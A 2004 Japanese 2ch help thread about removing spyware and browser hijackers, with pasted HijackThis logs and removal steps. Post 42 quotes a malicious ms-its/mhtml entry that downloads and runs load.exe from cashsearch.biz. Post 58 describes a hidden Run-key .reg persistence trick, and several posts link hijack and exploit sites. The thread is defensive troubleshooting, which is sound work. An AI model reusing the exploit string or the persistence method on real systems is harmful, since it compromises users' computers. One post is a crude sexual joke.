今後は予防策を考えてNE

42 :ひよこ名無しさん:04/05/18 02:52 ID:???
>>前スレの989

HijackThis 以外のウィンドウをすべて閉じて下記エントリを削除し、
その後PCを再起動してください、全てが悪玉と云う訳ではないです。

O4 - HKLM\..\Run: [SoundFusion] RunDll32 cwcprops.cpl,CrystalControlWnd

O4 - HKLM\..\Run: [LoadQM] loadqm.exe

O4 - HKLM\..\Run: [Upgrade Service] C:\WINDOWS\winupd.exe

O16 - DPF: {6D5FCFCB-FA6C-4CFB-9918-5F0A9F7365F2} (GigexCtrl ActiveX) - http://www.gigex.com/tv/igor/gigexagent.dll

O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1408.g.akamai.net/7/1408/9955/20040109/akamai.info.apple.com/iTunes4/WW/win/J019-0123.20040109.Jzse4/iTunesSetup.exe

O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe

その後WEB設定のリセット。

43 :ひよこ名無しさん:04/05/18 03:35 ID:MCkZ2ZS/
最近、やたらとエロ広告がポップアップで出てきます。
あと、2週間ぐらい前はアドレス欄に入力すると、なぜか
ライコスの英語版みたいなところに飛ばされました。

最近はさらにひどくなって、サーバーが使用中ですという
ダイアログがでてきます。切り替えてくださいみたいなのが
頻繁に表示されます。

これが、噂のスパイウエアかと思い、早速、テンプレの
a,b,cをインストールして試したのですが、やるたびに
コモンハイジャッカーというのが必ずでてきます。
何回、a,b,cで駆除しても、毎回10個ぐらいひっかかり
ます。

自分の駆除の仕方がおかしいんでしょうか?

44 :ひよこ名無しさん:04/05/18 03:42 ID:???

a,b,cだけで駆除できるのは3割くらい。

45 :43:04/05/18 03:48 ID:MCkZ2ZS/
まじで・・・?じゃあ、どうすりゃあいいんだよ・・・。
毎日、a,,b,cしてるんだけど、毎日何十個もウイルスっぽいのが
でてきて、きりがない・・・。

毎日毎日、コモンハイジャッカーがひっかかってる。

やっぱり、リカバリーしかないの・・・?

46 :ひよこ名無しさん:04/05/18 04:13 ID:???
>>45
●まず、デスクトップに新しいフォルダを作る。
デスクトップ上の何も無い場所を右クリック「新規作成」→「フォルダ」を左クリック
名前をつける、Hijackthisなど(適当な名前でよい)。
http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe
「保存」を押すと、保存先を聞かれる。
保存先には、先ほど作成した新しいフォルダを指定する。

●Hijackthis以外の窓を全部閉じる
Main画面でSCAN→SCANボタンがSave Logボタンに変わる→ボタンを押す→
Highjackthisが存在するディレクトリを選んで実行→ログファイルが作成されメモ帖で開かれる。
このログを貼り付ける。

●コントロールパネルの「アプリケーションの追加と削除」(Win XPの場合)「プログラムの追加と削除」に怪しいものがあったら書く。(重要)

●ウィルススキャンの結果も必ず書くこと。

ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp

*************やさしい鑑定人さんが来るまで気長に待つ************

みんな寝ちゃってるので気長に・・・

47 :ひよこ名無しさん:04/05/18 04:54 ID:???
Question
How do I remove or uninstall Lycos Sidesearch?
http://help.lycos.com/scripts/search.cfg/php.exe/enduser/std_adp.php?p_refno=030625-000008

48 :ひよこ名無しさん:04/05/18 04:55 ID:???
Symantec Security Response - Adware.SideSearch
http://www.symantec.com/region/jp/sarcj/data/a/adware.sidesearch.html

49 :ひよこ名無しさん:04/05/18 04:58 ID:???
定番スパイウェア除去ソフト↓をインストール(併用推奨)

    ・定番 スパイウェア除去ソフト Ad-Aware 使用法
     http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
    ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
     http://perso.wanadoo.es/lsmagsupermix1/

50 :ひよこ名無しさん:04/05/18 05:22 ID:???

(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

51 :ひよこ名無しさん:04/05/18 05:26 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、ウィルスのリンクを貼るアフォがいるね
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < 地雷かどうかアドレスをよく見て踏んでモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

52 :ひよこ名無しさん:04/05/18 05:41 ID:???
>>46
>>51


53 :ひよこ名無しさん:04/05/18 05:53 ID:???
>>52
氏ね。

54 :ひよこ名無しさん:04/05/18 06:39 ID:???
アイサーチなる謎の検索エンジンが立ち上がるのですが・・・・・・・・・。
インターネットオプションで元に戻しても勝手にアドレスが書き換えられます
助けてください。

55 :ひよこ名無しさん:04/05/18 06:43 ID:???
iSearch Toolbar Removal Instructions
http://toolbar.isearch.com/uninstall/

56 :ひよこ名無しさん:04/05/18 06:52 ID:???
>>55
>>51


57 :ひよこ名無しさん:04/05/18 06:58 ID:???
>>55
ありがとうございます。
がんばってみます。

>>56
大丈夫みたいですよ。

58 :ひよこ名無しさん:04/05/18 10:48 ID:OKnWyIBg
OS:Win2k、IE6.0sp1
gocybersearch.comとやらが検索ページになる状態になっていた
(普段はSleipnir使っててこの事に気づかず)
ノーd先生、spybot反応なし
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
のSearchURLがhttp://www.gocybersearch.com/ie/に置き換えられてたのでWebのリセットで標準に戻す
(他にもIEで置き換えられている箇所あり)

再起動すると同じ状態になったので次は
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runを見ると
"SystemSearch"="REGEDIT.EXE -s C:/WINNT/sys.reg"
こんなものがある
sys.regの中身はsys.regをRunに追加するものとIEの検索ページ、ツールバーを変更するものですた
SystemSearchを削除してsys.regも削除
再起動して元に戻る事はなし

昔はコレspywareとして検出された気がするのだが、今は検出されないっぽい
前スレまでしか過去ログ読まずにガイシュツかもしれんが無駄に書いてみるテスト

59 :ひよこ名無しさん:04/05/18 10:51 ID:???
>>58
http://gocybersearch.com/
Reset your Search page back to MSN Click Here ←

60 :ひよこ名無しさん:04/05/18 10:58 ID:???
ちゃぁーちゃちゃらららんらぁらっららっらーららららー

61 :ひよこ名無しさん:04/05/18 11:06 ID:Z4mdZs0C
インターネットをしていたら、パソコンがおかしくなってしまいました。
WINDOWSインストーラというものが出てくるんです・・・。
クリックするたび。

なので、インターネットの再インストというのをしたいんですがどうやってすればいいですか?

62 :ひよこ名無しさん:04/05/18 11:10 ID:???
>>59
そんなのあったのか・・・orz
それでlocalにあるsys.reg消されるとしたら実は危ないと思うがどうだろ
消されないならsys.regは手で消さないとゴミが残って・・・ってそたかが数kのファイルどうでもいいか(´・ω・`)

63 :ひよこ名無しさん:04/05/18 11:24 ID:???
>>58

原因となったと思われる怪しげなURLをOPERA7.5で開いたら
Javascriptエラーが出た

Inline script thread
Error:
name: TypeError
message: Statement on line 47: Expression did not evaluate to a function object: oPersist.load
Backtrace:
Line 47 of inline#3 script in http://www.gocybersearch.com/ie/
oPersist.load(xrand);
Line 5 of inline#3 script in http://www.gocybersearch.com/ie/
fnLoadInput();


64 :ひよこ名無しさん:04/05/18 11:50 ID:sbfRAOTP
まったくの初心者ですが
IEを侵犯されたのが悔しくて悔しくて
このスレをさかのぼり何度も何度も熟読して
Hijack Thisで削除できました
本当の理屈はわかりませんが
この場をお借りして善意の皆様全員にお礼を申し上げます

ありがとうございました

65 :145:04/05/18 11:51 ID:???
>>64
おめでd

66 :ひよこ名無しさん:04/05/18 12:44 ID:QkdDp2XH
初心者なんですが…

何度変更しても、ホームのHPが
ttp://jksearch.biz/redir.php になってしまいます。
特定のフォルダが開けません(開くと固まります)

お願いします。

67 :ひよこ名無しさん:04/05/18 12:44 ID:???
>>66
テンプレ読んでから質問しやがれエロガッパ

68 :ひよこ名無しさん:04/05/18 12:48 ID:???
>>66
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→WEB設定のリセット

2)IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ファイルの削除

3)削除したいファイルがあるが「アクセスできません。使用中です」等といわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動

6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://perso.wanadoo.es/lsmagsupermix1/

7)Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]

69 :ひよこ名無しさん:04/05/18 12:48 ID:???
>>66
( ´,_ゝ`)プッ

70 :66エロガッパ:04/05/18 12:49 ID:QkdDp2XH
>>67
読んだんですけどね…。
Win98です。
すみません(つД`)


71 :ひよこ名無しさん:04/05/18 12:53 ID:???
>>70
エロい、非常にエロい

72 :ひよこ名無しさん:04/05/18 12:53 ID:???
>>70
エロの道は険しい
睾丸目指してがんがれよ 少年

73 :66エロガッパ:04/05/18 12:55 ID:QkdDp2XH
>>72
少年でもないですが(つД`)


74 :ひよこ名無しさん:04/05/18 12:56 ID:???
>>70
エロエロ(゜д゜;)

75 :ひよこ名無しさん:04/05/18 12:56 ID:???
54 名前: 荒岸 ◆EzMONa3xWM [sage] 投稿日: 04/03/22 12:29 ID:???

⊇(;゜Д゜)⊂

76 :ひよこ名無しさん:04/05/18 12:56 ID:???
エロのためだとがんがれるだろ

77 :ひよこ名無しさん:04/05/18 12:58 ID:???
>>73
なかなかエロいページですね
サンクス

78 :ひよこ名無しさん:04/05/18 13:09 ID:???
ttp://jksearch.biz/secret.html

79 :ひよこ名無しさん:04/05/18 13:14 ID:???
>>78
クソサイトだな
どこ行ってもサムネイルばっかじゃないか
しかもページによって
JS.Exception.ExploitとかMHTMLRedir.Exploitが検出されるし

80 :前スレの989:04/05/18 13:16 ID:1ARkZthQ
>>42
アドバイスありがとうございます。
シマンテックのNorton AntiVirus体験版をインストールしまして、
ご指摘のエントリを削除後、再起動、WEB設定のリセットを行いました。

ですがIEのホームページが特定のサイトに変わってしまいます。
URLから見たところ、恐らく>>66の方も私と同じ症状だと思います。

以下に上記行程後のHijack Thisのログを貼り付けさせて頂きます。
どなたかアドバイス頂ければ幸いです。


81 :前スレの989:04/05/18 13:17 ID:1ARkZthQ
Logfile of HijackThis v1.97.7
Scan saved at 13:15:35, on 04/05/18
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCEVTMGR.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCSETMGR.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\EONEMNG.EXE
C:\WINDOWS\SMUNPLUG.EXE
C:\PROGRAM FILES\LOGICOOL\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCPD-LC\SYMLCSVC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCAPP.EXE
C:\WINDOWS\SYSTEM\CTFMON.EXE
C:\PROGRAM FILES\MCLEAN\MCLEAN.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\デスクトップ\HIGAITAISAKU\HIGAITAISAKU.EXE

82 :前スレの989:04/05/18 13:18 ID:1ARkZthQ
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [gnetmous] C:\GMOUSE\gnetmous.exe
O4 - HKLM\..\Run: [eoneMng] C:\WINDOWS\eonemng.exe
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [Symantec Core LC] C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe start
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [NAV CfgWiz] C:\Program Files\Common Files\Symantec Shared\CfgWiz.exe /GUID NAV /CMDLINE "REBOOT"
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [MDM7] "C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE"
O4 - HKLM\..\RunServices: [ScriptBlocking] "C:\Program Files\Common Files\Symantec Shared\Script Blocking\SBServ.exe" -reg
O4 - HKLM\..\RunServices: [ccEvtMgr] "C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe"
O4 - HKLM\..\RunServices: [ccSetMgr] "C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe"
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Startup: めもりーくりーなー.lnk = C:\Program Files\mclean\MClean.exe

83 :前スレの989:04/05/18 13:19 ID:1ARkZthQ
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\PROGRAM FILES\IRIA106\iria_ie2.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\PROGRAM FILES\IRIA106\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie4.htm
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie5.htm
O8 - Extra context menu item: FlashGetでダウンロード - C:\PROGRAM FILES\FLASHGET\jc_link.htm
O8 - Extra context menu item: FlashGetで全てダウンロード - C:\PROGRAM FILES\FLASHGET\jc_all.htm
O8 - Extra context menu item: Iriaでダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie1.htm
O8 - Extra context menu item: googleで検索 - C:\Program Files\YunaGoogle113\YunaGoogle.html
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://c:\PROGRA~1\MICROS~2\OFFICE10\EXCEL.EXE/3000
O8 - Extra context menu item: &iSearch The Web - res://C:\WINDOWS\SYSTEM\TOOLBAR.DLL/SEARCH.HTML
O9 - Extra button: ReGet (HKLM)
O9 - Extra 'Tools' menuitem: &Re&Get (HKLM)
O9 - Extra button: ICQ (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: Translate (HKLM)
O9 - Extra 'Tools' menuitem: Translator (HKLM)

84 :ひよこ名無しさん:04/05/18 13:43 ID:BbbJGE1e
>>78
外人のエロパワーはすごいね・・・。



85 :ひよこ名無しさん:04/05/18 13:46 ID:???
>>78
ウイルス警告出ますた・・・

(´・ω・`)ショボーン

86 :ひよこ名無しさん:04/05/18 13:47 ID:BbbJGE1e
>>73
確かにHPがこれになったら欝だな^^;
トップからモロ画像満載だし・・・。
でも個人で使うなら放置でもよいのでは?



87 :ひよこ名無しさん:04/05/18 14:48 ID:???
coolwebを撃退するためにアレコレしてたら、
検索エンジンのキーワード欄に書き込みできなくなりました。
おかげで検索が出来ません。

coolwebのブラウザのっとりはなくなったのですが、
ヤフーメールのパスワード入力とかもできなくなって非常に困っています。

どうにかする方法を教えていただけないでしょうか。

88 :ひよこ名無しさん:04/05/18 16:12 ID:???
メールのoutlook expressの立ち上がりが最近になって
重いです。以前はクリックするとパッと画面が変わっていたのに
最近は、2分位かかります…何か原因があるのでしょうか?
当方、VAIOでXPを入れています。
よろしくお願いします。

89 :ひよこ名無しさん:04/05/18 16:23 ID:???
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)  IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
   プログラム→WEB設定のリセット

2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
   一時ファイル→クッキーの削除+ファイルの削除

3)  削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
   削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)  勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
    アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)  ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
    http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動

6) 定番スパイウェア除去ソフト↓をインストール(併用推奨)

    ・定番 スパイウェア除去ソフト Ad-Aware 使用法
     http://www.dream-seed.com/server/spy.html
    ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
     http://www.dream-seed.com/server/spybot.html

7) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
    →[システムの復元]

------以上実行してまだトラブってたら(OS種類必須)再度質問して下さい----

90 :ひよこ名無しさん:04/05/18 16:50 ID:bxOfSVl6
すいません前スレでHOMEがabout:blankになって困っていたものですが
CoolWebShredderを使い直ったものです。
しかし一日たつとやはりhomeがabout:blankに設定されてしまい
毎回Ad-Aware,Spybot-S&D,CoolWebShredderをつかって削除していますが
何回もabout:blankに設定されて困っています。
HijackThisでログをとってみましたのでどなたかアドバイスをお願いいたします。
使用OSはXPでブラウザはIE6です。

91 :90:04/05/18 16:53 ID:bxOfSVl6
Logfile of HijackThis v1.97.7
Scan saved at 16:31:54, on 2004/05/18
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\WINDOWS\System32\sstray.exe
C:\Program Files\Winamp3\winampa.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Documents and Settings\Owner\デスクトップ\HJThis\HijackThis.exe

92 :90:04/05/18 16:54 ID:bxOfSVl6
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\NeroCheck.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp3\winampa.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Startup: log.dat
O4 - Startup: NTUSER.DAT
O4 - Startup: ntuser.dat.LOG
O4 - Startup: ntuser.ini
O4 - Startup: ~

93 :90:04/05/18 16:55 ID:bxOfSVl6
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\DOCUME~1\Owner\MYDOCU~1\iria107a\iria_ie5.htm
O8 - Extra context menu item: Iriaでダウンロード - C:\DOCUME~1\Owner\MYDOCU~1\iria107a\iria_ie1.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\DOCUME~1\Owner\MYDOCU~1\iria107a\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\DOCUME~1\Owner\MYDOCU~1\iria107a\iria_ie4.htm
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\DOCUME~1\Owner\MYDOCU~1\iria107a\iria_ie2.htm
O8 - Extra context menu item: Irvineですぐにダウンロード - C:\DOCUME~1\Owner\MYDOCU~1\IRVINE~1\ie_menu\iemenu10.htm
O8 - Extra context menu item: Irvineでダウンロード - C:\DOCUME~1\Owner\MYDOCU~1\IRVINE~1\ie_menu\iemenu1.htm
O8 - Extra context menu item: IrvineへすべてのURLを送る - C:\DOCUME~1\Owner\MYDOCU~1\IRVINE~1\ie_menu\iemenu2.htm
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37700.2663541667
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab


94 :前スレの989:04/05/18 17:25 ID:1ARkZthQ
すいません。
先ほどhijackthisのログ貼りの途中で書き込みができなくなってしまったので、
再度貼らせて頂きます。

現在起こっている障害については
>>11 (ウィルスを含むURLも貼り付けているので注意してください)
>>80
に記載してあります。

よろしくお願いします。

95 :ひよこ名無しさん:04/05/18 17:27 ID:???
エロサイトを見ていたら、勃起して我慢汁が出てきてしまいました。
どなたかフェラして助けてください。

96 :前スレの989:04/05/18 17:28 ID:1ARkZthQ
Logfile of HijackThis v1.97.7
Scan saved at 17:21:01, on 04/05/18
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCEVTMGR.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCSETMGR.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\EONEMNG.EXE
C:\WINDOWS\SMUNPLUG.EXE
C:\PROGRAM FILES\LOGICOOL\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCPD-LC\SYMLCSVC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCAPP.EXE
C:\WINDOWS\SYSTEM\CTFMON.EXE
C:\PROGRAM FILES\MCLEAN\MCLEAN.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\デスクトップ\HIGAITAISAKU\HIGAITAISAKU.EXE

97 :前スレの989:04/05/18 17:32 ID:1ARkZthQ
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [gnetmous] C:\GMOUSE\gnetmous.exe
O4 - HKLM\..\Run: [eoneMng] C:\WINDOWS\eonemng.exe
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [Symantec Core LC] C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe start
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [NAV CfgWiz] C:\Program Files\Common Files\Symantec Shared\CfgWiz.exe /GUID NAV /CMDLINE "REBOOT"
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [MDM7] "C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE"
O4 - HKLM\..\RunServices: [ScriptBlocking] "C:\Program Files\Common Files\Symantec Shared\Script Blocking\SBServ.exe" -reg
O4 - HKLM\..\RunServices: [ccEvtMgr] "C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe"
O4 - HKLM\..\RunServices: [ccSetMgr] "C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe"
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Startup: めもりーくりーなー.lnk = C:\Program Files\mclean\MClean.exe

98 :前スレの989:04/05/18 17:33 ID:1ARkZthQ
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\PROGRAM FILES\IRIA106\iria_ie2.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\PROGRAM FILES\IRIA106\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie4.htm
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie5.htm
O8 - Extra context menu item: FlashGetでダウンロード - C:\PROGRAM FILES\FLASHGET\jc_link.htm
O8 - Extra context menu item: FlashGetで全てダウンロード - C:\PROGRAM FILES\FLASHGET\jc_all.htm
O8 - Extra context menu item: Iriaでダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie1.htm
O8 - Extra context menu item: googleで検索 - C:\Program Files\YunaGoogle113\YunaGoogle.html
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://c:\PROGRA~1\MICROS~2\OFFICE10\EXCEL.EXE/3000
O8 - Extra context menu item: &iSearch The Web - res://C:\WINDOWS\SYSTEM\TOOLBAR.DLL/SEARCH.HTML
O9 - Extra button: ReGet (HKLM)
O9 - Extra 'Tools' menuitem: &Re&Get (HKLM)
O9 - Extra button: ICQ (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
